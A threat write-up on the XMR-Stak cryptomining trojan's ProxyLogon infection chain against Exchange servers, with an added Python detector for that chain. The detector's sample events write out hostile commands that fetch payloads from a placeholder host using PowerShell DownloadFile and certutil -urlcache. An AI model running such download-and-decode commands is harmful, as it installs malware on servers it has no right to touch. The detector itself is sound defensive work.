Discovered in March 2021, XMR-Stak is a cryptomining trojan that targets vulnerable Microsoft Exchange Server systems with a ProxyLogon exploit. Compromised email systems are used to both mine new currency and as payload hosting servers for new infections.
XMR-Stak is described as being a universal Stratum pool miner. The miner supports CPUs, AMD and NVIDIA GPUs and can be used to mine the cryptocurrencies Monero, Aeon and many other Cryptonight coins.
Vulnerable Microsoft Exchange servers are initially accessed using a PowerShell command to download a ZIP archive file from a previously compromised server’s Outlook Web Access path. This file is not a legitimate archive but is instead a batch script which, when executed, invokes certutil.exe to download and decode two additional spoofed ZIP archives.
The first of these files is another batch script, which decodes the second file, containing the miner and its configuration data, before injecting it into a running process. If successful, the script then deletes both itself and the other ZIP archives, leaving only the running mining process.
XMR-Stak configuration data states that it will only begin mining if it can create a TLS connection to the attacker’s Monero wallet.
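The infection chain above leaves two recognisable traces in process-creation telemetry: the Exchange worker process spawning PowerShell to fetch a file from an OWA path, and certutil.exe being used first to download and then to decode the spoofed archives. The following detector is an added example, not code from the original page; the event tuples, host names and file names are constructed, and the event layout (parent image, image, command line) is an assumption about the log source rather than any specific product's schema.

```python
import re

# Constructed sample events: (parent_image, image, command_line). Host and
# file names are placeholders, not indicators taken from the page.
SAMPLE_EVENTS = [
    # IIS worker on Exchange spawning PowerShell to fetch the fake ZIP from an OWA path
    ("w3wp.exe", "powershell.exe",
     "powershell -c (New-Object Net.WebClient).DownloadFile("
     "'http://compromised.example/owa/auth/a.zip','C:\\Windows\\Temp\\a.zip')"),
    # The batch script using certutil to download the spoofed archive ...
    ("cmd.exe", "certutil.exe",
     "certutil -urlcache -split -f http://compromised.example/owa/auth/b.zip b.zip"),
    # ... and then to decode it
    ("cmd.exe", "certutil.exe", "certutil -decode b.zip b.exe"),
    # Benign certutil use: listing a certificate store
    ("cmd.exe", "certutil.exe", "certutil -store My"),
    # Benign PowerShell launched from the desktop
    ("explorer.exe", "powershell.exe", "powershell -c Get-Process"),
]

DOWNLOAD_CMDLETS = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b", re.I)
OWA_PATH = re.compile(r"/owa/", re.I)

def match_rules(parent, image, cmd):
    """Return the names of every chain stage this single event matches."""
    parent, image = parent.lower(), image.lower()
    names = []
    if parent == "w3wp.exe" and image == "powershell.exe":
        names.append("exchange_worker_spawns_powershell")
    if image == "powershell.exe" and DOWNLOAD_CMDLETS.search(cmd) and OWA_PATH.search(cmd):
        names.append("powershell_downloads_from_owa_path")
    if image == "certutil.exe" and re.search(r"-urlcache", cmd, re.I):
        names.append("certutil_download")
    if image == "certutil.exe" and re.search(r"-decode", cmd, re.I):
        names.append("certutil_decode")
    return names

def evaluate(events):
    """Map each rule that fired to the indexes of the events that triggered it."""
    hits = {}
    for idx, (parent, image, cmd) in enumerate(events):
        for name in match_rules(parent, image, cmd):
            hits.setdefault(name, []).append(idx)
    return hits

def chain_score(events):
    """Number of distinct chain stages observed; several together on one host is high confidence."""
    return len(evaluate(events))
```

On its own, certutil -urlcache or -decode has legitimate administrative uses, so the stages are scored together rather than alerted on individually.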
If you're unsure what cryptocurrency is and how it works, we suggest you read up on it; there are lots of good books out there, for example Cryptocurrency Investing For Dummies or Bitcoin For Dummies. We have found that the “For Dummies” range of books offers a great start to any subject area you're unsure about.
Indicators of compromise